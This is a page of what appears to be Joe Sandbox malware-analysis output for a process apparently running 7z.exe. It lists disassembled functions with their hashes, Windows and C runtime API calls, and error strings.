                              • Opcode ID: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                              • Instruction ID: 27e6c5bf4117b4697e63c742657c6c2bed0f198169ceefa183b12a43f4835981
                              • Opcode Fuzzy Hash: 44c1d27728ff92053e539249098bfb9970b541923050162c49c8805df1a7c07d
                              • Instruction Fuzzy Hash: 73219072700B4686D720DF56E85071DB7A1FB98B98F54C13ADA8D43B64EF38D846D701
                              Function 00F7D460 Relevance: 6.3, APIs: 5, Instructions: 54COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                              • Instruction ID: 9fc787fa9a5e0db99d7e106f18fe6aaa39ea7817c36e25e06da19a675a02c108
                              • Opcode Fuzzy Hash: aa15c429ddaab6e7a21c021ac8bfe6753cb256810df34c54073a5922f3fe802c
                              • Instruction Fuzzy Hash: 3511572221454592CA60FB25EC5135EB320FBD5364F849213F69D876A9DF6CCA05DB41
                              Function 00F71874 Relevance: 6.3, APIs: 5, Instructions: 49COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                              • Instruction ID: 28f33d37ab54734feea53801f200352097c8f18ba13b87cd602c5795c850db46
                              • Opcode Fuzzy Hash: a8389d49ebc912c1b78d46df2f351949851e287fcb576c4ad785c454a533a5d9
                              • Instruction Fuzzy Hash: 8901C423702A4996CB60EB26D81166D2320F785FB4F588322DF2D1BB90CF29C8269311
                              Function 00F9C044 Relevance: 6.3, APIs: 5, Instructions: 40COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00F9C057
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98E74
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98E7D
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98EA8
                                • Part of subcall function 00F98E64: free.MSVCRT ref: 00F98EB0
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F99962
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F9996B
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F99974
                                • Part of subcall function 00F99930: free.MSVCRT ref: 00F9997C
                              • free.MSVCRT ref: 00F9C072
                              • free.MSVCRT ref: 00F9C07B
                              • free.MSVCRT ref: 00F9C0A6
                              • free.MSVCRT ref: 00F9C0AE
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                              • Instruction ID: 05f95d8b9f646513c33f8d210485474498b73e46af358ddf519524644eab3e3b
                              • Opcode Fuzzy Hash: 51f15b651d00e51d326922a6f601ad02451ce5b0bdb61253a7e8b2723f3faaf4
                              • Instruction Fuzzy Hash: 74F0AD23B0295496DE94FA26CD5116C2320AB85FA0F488122AF0D4F661DF2ACC72A390
                              Function 00FA1660 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                              • Instruction ID: c7fe6e06a7efbb5dba6823f03061f7908b89d02b91833fc71fdf3dbe7045cd91
                              • Opcode Fuzzy Hash: 57650b3b88bf0d0f50e31ce842fe8f779f29f1a674ce84d465df258e08a5fb3d
                              • Instruction Fuzzy Hash: 96F09067B1294485CB91EE3ADC5126C2321FB86FE8F5D4232DE1D5F355DE2ACC529310
                              Function 00FAB7B0 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                              • Instruction ID: c33e5e92aaedeffb3a4cb223f64df0bafbc0d88f808b8363108c873c78c39f70
                              • Opcode Fuzzy Hash: e564a7ea03bf336738886359d3ffe7a8aafeb4ebfbf7f9a7706ddaf490634256
                              • Instruction Fuzzy Hash: 96F09653B01A8989CB90AE2BDC9116C23149F86BE5B5C8532FF0D1B755DF29CC639310
                              Function 00FC786C Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                              • Instruction ID: 64359b44edf3c84e0a22fc8508918b04695ea9ebbed03cce05e715e01d5079e7
                              • Opcode Fuzzy Hash: 3f6ba1c832bdc57f2aade2322f716c71dab9e2d6315d7be1efef08c08254ca37
                              • Instruction Fuzzy Hash: 72F02B13B01A8589CB91FE3ACD5112C2321EBC1FE8B284126AF1D1F384CE29CC52D350
                              Function 00FAB820 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                              • Instruction ID: cbcc09771d990ff0d3423d7e136e020a0d2c9b53c3786ff0d90319265382c26a
                              • Opcode Fuzzy Hash: 220e844c16fe5fbc67ee198f903663c6704053668a6464895724f781ceb88cc1
                              • Instruction Fuzzy Hash: ADF09693B01A8489CB50AE2ADC9125C2324AF56BE9F5C8532FF0D1B755DF2DCCA39310
                              Function 00F87F18 Relevance: 6.3, APIs: 5, Instructions: 36COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                              • Instruction ID: ececb226e089c7b74f4245f53ee1a98196d2250219892dfe92aa20f812b4a869
                              • Opcode Fuzzy Hash: 69aaf988170bd5df535a70f46f762111c31b67bf07b1f82691828dd78cfcb4cb
                              • Instruction Fuzzy Hash: 18F09023B11A4989CB91FE37DC5116D2320EB95FE4B698122AF1D1F354DE39CC62A350
                              Function 00FC6B38 Relevance: 6.3, APIs: 5, Instructions: 28COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FC6B57
                              • free.MSVCRT ref: 00FC6B63
                              • free.MSVCRT ref: 00FC6B6F
                              • free.MSVCRT ref: 00FC6B86
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB629
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB636
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB642
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB64C
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB656
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB660
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB66A
                                • Part of subcall function 00FCB604: free.MSVCRT ref: 00FCB674
                              • free.MSVCRT ref: 00FC6B9C
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                              • Instruction ID: 03aed20f5fb368c485b4a161285728d6c621d45641fdfe1a0c45d03b4147c0bd
                              • Opcode Fuzzy Hash: 61d0609e7619a37457f59db048ca76362673db0d964c2751e3e4b42c7523d082
                              • Instruction Fuzzy Hash: 37F0122630574A91CB98E722DF967BC7321EBC9790F444022AE0D9F712DF2DD9B2A311
                              Function 00FAB890 Relevance: 6.3, APIs: 5, Instructions: 24COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID:
                              • API String ID: 1294909896-0
                              • Opcode ID: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                              • Instruction ID: f298fa227e5d6f07306c27d45aeeb9a972504d261bc4348419cf0b967306669a
                              • Opcode Fuzzy Hash: e9d31e9b3cf5b050249e2f7d49395da2eb8981ae7d163e8eb79dc2eec26a846d
                              • Instruction Fuzzy Hash: C7E0C062701A4993CB84AB26CE9102C7320F785FA4B5481129F1D5F751DF29DCB29351
                              Function 00FC428C Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 99COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FC43BD
                                • Part of subcall function 00F72CF8: _CxxThrowException.MSVCRT ref: 00F72D3A
                              • free.MSVCRT ref: 00FC43DD
                              • free.MSVCRT ref: 00FC43E7
                                • Part of subcall function 00F72E68: free.MSVCRT ref: 00F72EA0
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ExceptionThrow
                              • String ID: =
                              • API String ID: 4001284683-2525689732
                              • Opcode ID: 52812591fcafc331c52f57bc36488258389c83dd43e9cbf9136e664f95f8f4a7
                              • Instruction ID: 2cc710f8f9992b8a35d080c0442e05003e34b03180ce5f44d34a03199da800f9
                              • Opcode Fuzzy Hash: 52812591fcafc331c52f57bc36488258389c83dd43e9cbf9136e664f95f8f4a7
                              • Instruction Fuzzy Hash: A43127233056C196CB10EB15E8917AEB721F7D17A0F948127FB8E43AA8CB7CC945EB01
                              Function 00FB5D74 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 85COMMON
                              Download Yara Rule
                              APIs
                              • free.MSVCRT ref: 00FB5EA0
                                • Part of subcall function 00F738A8: free.MSVCRT ref: 00F738E0
                                • Part of subcall function 00F736A8: memmove.MSVCRT ref: 00F736CD
                              • free.MSVCRT ref: 00FB5E92
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$memmove
                              • String ID: exe
                              • API String ID: 1534225298-1801697008
                              • Opcode ID: 71fe5a71670546eb5239c1d0221a77139611f9aa0fd55ab8de3c3dedd5977562
                              • Instruction ID: 28c8e5d7a8165b503caa2a289a44c223b1e14cca01da93d86100fb495ca2be8c
                              • Opcode Fuzzy Hash: 71fe5a71670546eb5239c1d0221a77139611f9aa0fd55ab8de3c3dedd5977562
                              • Instruction Fuzzy Hash: 7B3174A3204A05B5CE30EB26E8405DE7721E795BD4F845212EB9E07669DF2CC686EB01
                              Function 00F8C0A4 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 81COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Cannot open input file
                              • API String ID: 1294909896-2161566465
                              • Opcode ID: 58959c840e227c6da1d2274cf27faa0274c02659c40c750a4c752da915c35793
                              • Instruction ID: 14885c8ac30b22afa1a2e04f3a04fad680e9eeb8189a60a532b47b422bb2bf8e
                              • Opcode Fuzzy Hash: 58959c840e227c6da1d2274cf27faa0274c02659c40c750a4c752da915c35793
                              • Instruction Fuzzy Hash: 49219323304B4181CB61AB35D89479D3761E789BF4F485222EE5E473A6DF38C44AE760
                              Function 00FA7EB0 Relevance: 6.1, APIs: 4, Instructions: 79COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ByteStringmemmove
                              • String ID:
                              • API String ID: 400576877-0
                              • Opcode ID: 3b1a09b1c6b658a44b1b7e4762f9d2fb1a3346077ad603746695a766c5ac0bb5
                              • Instruction ID: e14f9fcad97454e218d5569ed14c6854f55ec98678dde53f4ec3d1e1b37e25ce
                              • Opcode Fuzzy Hash: 3b1a09b1c6b658a44b1b7e4762f9d2fb1a3346077ad603746695a766c5ac0bb5
                              • Instruction Fuzzy Hash: 9B21F9A3318B8085EB24AF51EC50B6D7360FB897A4F084135AF5A0B784DF3CC950D390
                              Function 00FA8BA4 Relevance: 6.1, APIs: 4, Instructions: 75COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$wcscmp
                              • String ID:
                              • API String ID: 4021281200-0
                              • Opcode ID: 85368f472c2565e39e1379fdb09b27c90018d9c80aa8451b196272df9c379c91
                              • Instruction ID: a6bd1dd7ee851cfa123936a2e67035e7edfe689cb43a6377adf553fc0aa4572c
                              • Opcode Fuzzy Hash: 85368f472c2565e39e1379fdb09b27c90018d9c80aa8451b196272df9c379c91
                              • Instruction Fuzzy Hash: 482127B320074596CB20EF25D84036D7720F78ABF4F048222AF2A47794EF79C956EB50
                              Function 00F83C20 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 65COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free
                              • String ID: Unsupported charset:
                              • API String ID: 1294909896-616772432
                              • Opcode ID: af49dab0716dd56378aafb27f7c9511f5796b18d30d98875e15fa81bbabf670f
                              • Instruction ID: c029883bbe02fc96697f69c1d660427e6bde7511e768263d9db82abafe9f0b6f
                              • Opcode Fuzzy Hash: af49dab0716dd56378aafb27f7c9511f5796b18d30d98875e15fa81bbabf670f
                              • Instruction Fuzzy Hash: 3421A423704A0592DB20EB18E88079D7721E7D5BF8F544222EA9E17774CF2DCA86E700
                              Function 00F77474 Relevance: 6.1, APIs: 4, Instructions: 56fileCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNELBASE ref: 00F786EA
                                • Part of subcall function 00F786C8: GetFileAttributesW.KERNEL32 ref: 00F78721
                                • Part of subcall function 00F786C8: free.MSVCRT ref: 00F7872E
                              • DeleteFileW.KERNEL32 ref: 00F774BC
                              • DeleteFileW.KERNEL32 ref: 00F774F6
                              • free.MSVCRT ref: 00F77506
                              • free.MSVCRT ref: 00F77514
                                • Part of subcall function 00F76FCC: SetFileAttributesW.KERNELBASE ref: 00F76FF3
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: File$Attributesfree$Delete
                              • String ID:
                              • API String ID: 324319583-0
                              • Opcode ID: df10b4b8c6684096170c9c9ab05feeb6452345b4778a22d60cfa43d5eec70c0a
                              • Instruction ID: ed643c83600a52c508afe2c584c702dbc77ce0797a27929a4159f174d6f001ea
                              • Opcode Fuzzy Hash: df10b4b8c6684096170c9c9ab05feeb6452345b4778a22d60cfa43d5eec70c0a
                              • Instruction Fuzzy Hash: 8101612365870281CA30BB34AC5537D23119BC77B5F5C9723ED6E872E9EE2DC946B602
                              Function 00F86E88 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 51COMMON
                              Download Yara Rule
                              APIs
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: free$ErrorLastmemmove
                              • String ID: :
                              • API String ID: 3561842085-3653984579
                              • Opcode ID: f731f73897d40f4106503fc5ae5574629f1505dfaec5e9930ae7f0c8b602ac3b
                              • Instruction ID: 86ddd792e5a2112c098bd9f4d75670da6a029b1931cb402324093d2455915067
                              • Opcode Fuzzy Hash: f731f73897d40f4106503fc5ae5574629f1505dfaec5e9930ae7f0c8b602ac3b
                              • Instruction Fuzzy Hash: E2114F6330094591DA60AB29EC4125A7762EBC87E4F448222AE5D877A9DE2CCA86D701
                              Function 00F7EA4C Relevance: 6.0, APIs: 4, Instructions: 49fileCOMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: ErrorLast$FileHandleRead
                              • String ID:
                              • API String ID: 2244327787-0
                              • Opcode ID: 2a36d553e8cbc6b90497e1e8e87a78b980c29a6e2c3229926d861df111c85240
                              • Instruction ID: 655ca3a937a5221db43e3750435557874e3e12154b13ecd09712e0e190b033f3
                              • Opcode Fuzzy Hash: 2a36d553e8cbc6b90497e1e8e87a78b980c29a6e2c3229926d861df111c85240
                              • Instruction Fuzzy Hash: D701A712A104628BE7229B3D9D007696395F70CBE5F548177FE4ACBB94DE2CCC459742
                              Function 00FCAFF4 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 43COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000006.00000002.2198906049.0000000000F71000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F70000, based on PE: true
                              • Associated: 00000006.00000002.2198887161.0000000000F70000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198953506.0000000000FD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2198983761.0000000000FF1000.00000004.00000001.01000000.00000007.sdmpDownload File
                              • Associated: 00000006.00000002.2199002863.0000000000FF4000.00000002.00000001.01000000.00000007.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_6_2_f70000_7z.jbxd
                              Similarity
                              • API ID: fputs
                              • String ID: Break signaled$ERROR: Can't allocate required memory!$System ERROR:
                              • API String ID: 1795875747-932691680
